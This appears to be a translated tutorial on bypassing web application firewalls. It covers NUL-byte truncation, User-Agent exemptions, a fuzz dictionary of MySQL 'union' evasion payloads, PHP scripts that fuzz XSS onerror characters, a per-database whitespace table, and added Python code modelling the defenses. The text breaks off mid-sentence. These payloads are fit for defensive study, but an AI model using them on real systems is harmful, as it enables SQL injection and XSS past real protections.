WAF categories:
1. Network-layer WAFs
2. Application-layer WAFs, the most common kind and the easiest to deploy (placed either in front of Apache or behind it)
Application-layer WAFs: bypasses that combine the WAF's own defects with MySQL syntax quirks, as encountered in practice:
The most common WAF detection method is keyword matching. For example, if a SQL fragment such as [space]union[space] appears in a request, the request is treated as malicious and the packet is dropped; XSS payloads are handled the same way.
Common bypass types:
Type 1:
Packet -> WAF (stores the request parameters in a string, decodes them, then inspects) -> Apache
When a WAF written in C++ or a similar language stores the request in a string-like structure, %00 becomes a NUL byte on decoding and truncates everything that follows it in the request.
So a request such as ?id=1%00%20and%201=1 is seen by the WAF as ?id=1, and the inspection is bypassed.
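As an added example (not code from the original post), the following Python models the Type 1 failure: a WAF that copies the decoded parameter into a NUL-terminated buffer inspects only the bytes before %00, while a length-preserving decoder sees the whole payload. The sample request, the rule and the function names are constructed for illustration.

```python
import re

# Constructed sample: the Type 1 request from the text, as sent on the wire.
REQUEST = b"?id=1%00%20and%201=1"

# A rule of the kind the text describes: the keyword with whitespace on each side.
RULE = re.compile(rb"\sand\s", re.I)

def percent_decode(raw: bytes) -> bytes:
    """Decode %XX escapes into raw bytes, keeping NUL (0x00) as ordinary data."""
    return re.sub(rb"%([0-9a-fA-F]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)

def decode_like_cstring(raw: bytes) -> bytes:
    """Model a WAF that copies the decoded bytes into a NUL-terminated C string:
    everything after the first 0x00 is silently dropped before inspection."""
    return percent_decode(raw).split(b"\x00", 1)[0]

def inspect(decoded: bytes) -> bool:
    """True when the rule fires on the bytes the engine actually gets to see."""
    return RULE.search(decoded) is not None

def truncating_waf_blocks(raw: bytes) -> bool:
    # The flawed pipeline: decode into a C string, then inspect what is left.
    return inspect(decode_like_cstring(raw))

def length_preserving_waf_blocks(raw: bytes) -> bool:
    # The fix: inspect the full byte string, and treat a raw NUL inside a query
    # parameter as suspicious by itself, since no legitimate value needs one.
    data = percent_decode(raw)
    return b"\x00" in data or inspect(data)

if __name__ == "__main__":
    print(decode_like_cstring(REQUEST))            # b'?id=1'
    print(truncating_waf_blocks(REQUEST))          # False: payload reaches the backend
    print(length_preserving_waf_blocks(REQUEST))   # True
```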
Type 2:
Packet -> WAF -> Apache
Bypass logic:
The WAF exempts certain User-Agents from inspection (for example the Baidu spider UA)
The WAF exempts certain POST requests from inspection (file-upload requests)
Type 3:
Packet -> WAF -> Apache
Bypasses built on MySQL syntax quirks, unusual ways of writing HTML, and the way browsers render it. Because the WAF's actual detection logic is unknown during real-world testing, fuzzing is the best approach, and this is also the most common way WAFs get bypassed.
Fuzz dictionary:
%a0union%a0 (the WAF's regex \s does not match %a0, but MySQL treats it as whitespace)
%0aunion%0a
%0bunion%0b (the WAF's regex \s and \t do not match %0b)
%09union%09
/**/union/**/
%0dunion%0d
/*%e4*/union/*%e4*/ (half of a UTF-8 Chinese character; the regex wildcard (.) cannot match it)
`version`() (MySQL syntax quirk: a function can be written as `function_name`())
/*!union*/
8E0union (MySQL syntax quirk: once the parser has recognized a floating-point literal the token ends, so what follows is treated as if separated by a space; the same applies to the next two)
8.0union
\Nunion
.1union/*.1*/
...
An XSS fuzzing example:
"Using fuzzing to find which characters can be joined seamlessly in front of onerror"
Write fuzzz.php and fuzz.php as follows
fuzzz.php:
<?php
// Enumerate every byte value 00..ff and load fuzz.php once per value.
$urlhex = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'];
for ($i = 0; $i < 16; $i++) {
    for ($ii = 0; $ii < 16; $ii++) {
        $hex     = $urlhex[$i] . $urlhex[$ii];        // label shown in the alert, e.g. "0c"
        $realhex = '%' . $urlhex[$i] . $urlhex[$ii];  // byte under test, URL-encoded, e.g. "%0c"
        // The markup inside this echo was lost in extraction; reconstructed here:
        // one frame per byte, so that each test case renders in isolation.
        echo "<iframe src=\"fuzz.php?c=$realhex&d=$hex\"></iframe>";
    }
}
?>
fuzz.php:
<?php
$code = $_GET['c'];  // the byte under test (PHP has already percent-decoded it)
$cc   = $_GET['d'];  // its hex label, echoed back in the alert
// The img tag in front of onerror was lost in extraction; reconstructed below.
?>
<img src="x"<?php echo $code; ?>onerror="alert('<?php echo $cc; ?>')">
Run fuzzz.php to fuzz automatically; the result is:
0c, 0d, 2f, 0a, 20, 09
In the same way one can fuzz out which special characters are accepted at other positions of the various tags.
Appendix: fuzz results for the bytes each database accepts as whitespace in SQL statements:
SQLite3: 0A, 0D, 0C, 09, 20
MySQL 5: 09, 0A, 0B, 0C, 0D, A0, 20
PostgreSQL: 0A, 0D, 0C, 09, 20
Oracle 11g: 00, 0A, 0D, 0C, 09, 20
MSSQL: 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20
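As an added example (not code from the original post), this Python canonicalizes a parameter the way MySQL will tokenize it, using the whitespace table above together with the comment, backtick, \N and numeric-literal tricks from the fuzz dictionary, so that a token-boundary rule catches what an ASCII-\s rule misses. The engine table, both rules and the function names are constructed here for illustration.

```python
import re

# Whitespace bytes each engine accepts, taken from the fuzz table above.
SQL_WHITESPACE = {
    "mysql5": bytes.fromhex("090a0b0c0da020"),
    "sqlite3": bytes.fromhex("0a0d0c0920"),
    "postgresql": bytes.fromhex("0a0d0c0920"),
    "oracle_11g": bytes.fromhex("000a0d0c0920"),
    "mssql": bytes(range(0x01, 0x21)),
}
# The weak rule class the text describes: ASCII \s on both sides of the keyword.
WEAK_RULE = re.compile(rb"\sunion\s|version\(", re.I)
# Keyword test on normalized text: a token boundary, not a literal space.
STRONG_RULE = re.compile(rb"(?<![a-z0-9_])(?:union(?![a-z0-9_])|version ?\()")

def percent_decode(raw: bytes) -> bytes:
    """Decode %XX to raw bytes; a lone 0xE4 (half a UTF-8 character) survives."""
    return re.sub(rb"%([0-9a-fA-F]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)

def normalize(raw: bytes, engine: str = "mysql5") -> bytes:
    """Rewrite the decoded input into the token stream the SQL engine will see."""
    data = percent_decode(raw)
    # MySQL executes the body of /*!...*/; any other comment is just a separator.
    data = re.sub(rb"/\*!(.*?)\*/", rb" \1 ", data, flags=re.S)
    data = re.sub(rb"/\*.*?\*/", b" ", data, flags=re.S)
    # \N is MySQL's NULL literal, and backticks only quote a name, so `version`()
    # is the same call as version().
    data = data.replace(b"\\N", b" NULL ").replace(b"`", b" ")
    # Every byte the engine treats as whitespace collapses to one ASCII space.
    ws = SQL_WHITESPACE[engine]
    data = data.translate(bytes.maketrans(ws, b" " * len(ws)))
    # A numeric literal (8E0, 8.0, .1) ends at the first letter that cannot
    # extend it, so 8E0union is two tokens: put the lost separator back.
    data = re.sub(rb"(?<![a-z_])(\d*\.?\d+(?:e\d+)?)(?=[a-z])", rb"\1 ", data, flags=re.I)
    return re.sub(rb" +", b" ", data).lower()

def weak_blocks(raw: bytes) -> bool:
    return WEAK_RULE.search(percent_decode(raw)) is not None

def strong_blocks(raw: bytes, engine: str = "mysql5") -> bool:
    return STRONG_RULE.search(normalize(raw, engine)) is not None

# Dictionary entries the text annotates as slipping past an ASCII-\s rule.
EVASIONS = [b"%a0union%a0", b"/**/union/**/", b"/*%e4*/union/*%e4*/",
            b"`version`()", b"/*!union*/", b"8E0union", b"8.0union",
            b"\\Nunion", b".1union/*.1*/"]

if __name__ == "__main__":
    print([(e, weak_blocks(e), strong_blocks(e), normalize(e)) for e in EVASIONS])
```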
Type 4:
Packet -> WAF -> Apache
This is something the WAF cannot account for…
The risks left behind when malicious code is detected and sanitized in several passes:
Example (already fixed):
Vulnerability name: crm2.qq.com XSS
Submitted: 2015-03-30 13:39:31
“This is where we ran into your mysterious WAF,